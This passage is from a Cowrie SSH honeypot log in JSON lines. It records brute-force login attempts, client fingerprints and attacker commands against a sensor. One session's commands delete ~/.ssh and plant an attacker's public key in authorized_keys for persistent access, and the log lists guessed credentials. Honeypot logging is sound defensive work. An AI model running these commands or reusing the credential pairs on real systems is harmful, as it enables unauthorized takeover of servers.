":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:32:32.481801Z","src_ip":"170.64.166.123","session":"b8d8ffc708b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60398,"dst_ip":"1.2.3.4","dst_port":22,"session":"5413b1cd8342","protocol":"ssh","message":"New connection: 212.227.235.229:60398 (1.2.3.4:22) [session: 5413b1cd8342]","sensor":"my-vps","timestamp":"2025-08-31T05:32:33.568066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:32:33.568948Z","src_ip":"212.227.235.229","session":"5413b1cd8342"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:32:33.624979Z","src_ip":"170.64.166.123","session":"b8d8ffc708b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:32:33.843959Z","src_ip":"212.227.235.229","session":"5413b1cd8342"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:34.901896Z","src_ip":"170.64.166.123","session":"b8d8ffc708b7"}
{"eventid":"cowrie.login.failed","username":"user","password":"!QAZ2wsx3edc","message":"login attempt [user/!QAZ2wsx3edc] failed","sensor":"my-vps","timestamp":"2025-08-31T05:32:34.985798Z","src_ip":"212.227.235.229","session":"5413b1cd8342"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":41348,"dst_ip":"1.2.3.4","dst_port":22,"session":"22f04d66c07d","protocol":"ssh","message":"New connection: 170.64.166.123:41348 (1.2.3.4:22) [session: 22f04d66c07d]","sensor":"my-vps","timestamp":"2025-08-31T05:32:35.175506Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:32:35.176903Z","src_ip":"170.64.166.123","session":"22f04d66c07d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:32:35.451835Z","src_ip":"170.64.166.123","session":"22f04d66c07d"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:36.262111Z","src_ip":"212.227.235.229","session":"5413b1cd8342"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:32:36.592793Z","src_ip":"170.64.166.123","session":"22f04d66c07d"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:36.868873Z","src_ip":"170.64.166.123","session":"22f04d66c07d"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:36.869867Z","src_ip":"170.64.166.123","session":"b83571796677"}
{"eventid":"cowrie.session.closed","duration":"35.0","message":"Connection lost after 35.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:41.525491Z","src_ip":"212.227.235.229","session":"3608f05ebd05"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52354,"dst_ip":"1.2.3.4","dst_port":22,"session":"61d9fc8fdaee","protocol":"ssh","message":"New connection: 212.227.125.160:52354 (1.2.3.4:22) [session: 61d9fc8fdaee]","sensor":"my-vps","timestamp":"2025-08-31T05:32:53.526128Z"}
{"eventid":"cowrie.session.closed","duration":"54.1","message":"Connection lost after 54.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:54.380848Z","src_ip":"212.227.125.160","session":"ebeb1bfd17e5"}
{"eventid":"cowrie.session.connect","src_ip":"147.45.50.33","src_port":46870,"dst_ip":"1.2.3.4","dst_port":22,"session":"0be771ad8483","protocol":"ssh","message":"New connection: 147.45.50.33:46870 (1.2.3.4:22) [session: 0be771ad8483]","sensor":"my-vps","timestamp":"2025-08-31T05:32:55.119151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:32:55.120117Z","src_ip":"147.45.50.33","session":"0be771ad8483"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:32:55.139970Z","src_ip":"147.45.50.33","session":"0be771ad8483"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@wsx","message":"login attempt [root/1qaz@wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:32:55.262011Z","src_ip":"147.45.50.33","session":"0be771ad8483"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:32:55.697562Z","src_ip":"147.45.50.33","session":"0be771ad8483"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:32:55.698407Z","src_ip":"147.45.50.33","session":"0be771ad8483"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:32:55.699913Z","src_ip":"147.45.50.33","session":"0be771ad8483"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:55.720993Z","src_ip":"147.45.50.33","session":"0be771ad8483"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:32:55.783624Z","src_ip":"147.45.50.33","session":"0be771ad8483"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:32:55.784422Z","src_ip":"147.45.50.33","session":"0be771ad8483"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:32:55.806364Z","src_ip":"147.45.50.33","session":"0be771ad8483"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:55.807281Z","src_ip":"147.45.50.33","session":"0be771ad8483"}
{"eventid":"cowrie.session.connect","src_ip":"147.45.50.33","src_port":46872,"dst_ip":"1.2.3.4","dst_port":22,"session":"6abf874aa7f1","protocol":"ssh","message":"New connection: 147.45.50.33:46872 (1.2.3.4:22) [session: 6abf874aa7f1]","sensor":"my-vps","timestamp":"2025-08-31T05:32:55.825540Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:32:55.826529Z","src_ip":"147.45.50.33","session":"6abf874aa7f1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:32:55.846470Z","src_ip":"147.45.50.33","session":"6abf874aa7f1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:32:55.966242Z","src_ip":"147.45.50.33","session":"6abf874aa7f1"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:56.988765Z","src_ip":"147.45.50.33","session":"6abf874aa7f1"}
{"eventid":"cowrie.session.connect","src_ip":"147.45.50.33","src_port":46874,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d7fe9043e63","protocol":"ssh","message":"New connection: 147.45.50.33:46874 (1.2.3.4:22) [session: 9d7fe9043e63]","sensor":"my-vps","timestamp":"2025-08-31T05:32:57.007746Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:32:57.008752Z","src_ip":"147.45.50.33","session":"9d7fe9043e63"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:32:57.029101Z","src_ip":"147.45.50.33","session":"9d7fe9043e63"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:32:57.149986Z","src_ip":"147.45.50.33","session":"9d7fe9043e63"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:57.171360Z","src_ip":"147.45.50.33","session":"0be771ad8483"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:32:57.172194Z","src_ip":"147.45.50.33","session":"9d7fe9043e63"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:32:58.947336Z","src_ip":"212.227.125.160","session":"61d9fc8fdaee"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:32:58.948067Z","src_ip":"212.227.125.160","session":"61d9fc8fdaee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41044,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf0656b1ee53","protocol":"ssh","message":"New connection: 212.227.235.229:41044 (1.2.3.4:22) [session: cf0656b1ee53]","sensor":"my-vps","timestamp":"2025-08-31T05:32:59.299862Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:32:59.976595Z","src_ip":"212.227.235.229","session":"cf0656b1ee53"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:32:59.977276Z","src_ip":"212.227.235.229","session":"cf0656b1ee53"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58702,"dst_ip":"1.2.3.4","dst_port":22,"session":"3087de03493f","protocol":"ssh","message":"New connection: 212.227.235.229:58702 (1.2.3.4:22) [session: 3087de03493f]","sensor":"my-vps","timestamp":"2025-08-31T05:33:04.571240Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:33:04.572109Z","src_ip":"212.227.235.229","session":"3087de03493f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:33:04.653190Z","src_ip":"212.227.235.229","session":"3087de03493f"}
{"eventid":"cowrie.login.failed","username":"alba","password":"alba","message":"login attempt [alba/alba] failed","sensor":"my-vps","timestamp":"2025-08-31T05:33:05.019140Z","src_ip":"212.227.235.229","session":"3087de03493f"}
{"eventid":"cowrie.login.failed","username":"test1","password":"12345678","message":"login attempt [test1/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T05:33:05.787283Z","src_ip":"212.227.235.229","session":"cf0656b1ee53"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:33:06.102185Z","src_ip":"212.227.235.229","session":"3087de03493f"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:33:07.795260Z","src_ip":"212.227.235.229","session":"cf0656b1ee53"}
{"eventid":"cowrie.login.failed","username":"mongodb","password":"123456","message":"login attempt [mongodb/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:33:07.925828Z","src_ip":"212.227.125.160","session":"61d9fc8fdaee"}
{"eventid":"cowrie.session.closed","duration":"17.1","message":"Connection lost after 17.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:33:10.608026Z","src_ip":"212.227.125.160","session":"61d9fc8fdaee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60050,"dst_ip":"1.2.3.4","dst_port":22,"session":"8eb1e2942020","protocol":"ssh","message":"New connection: 212.227.235.229:60050 (1.2.3.4:22) [session: 8eb1e2942020]","sensor":"my-vps","timestamp":"2025-08-31T05:33:13.849224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:33:15.813793Z","src_ip":"212.227.235.229","session":"8eb1e2942020"}
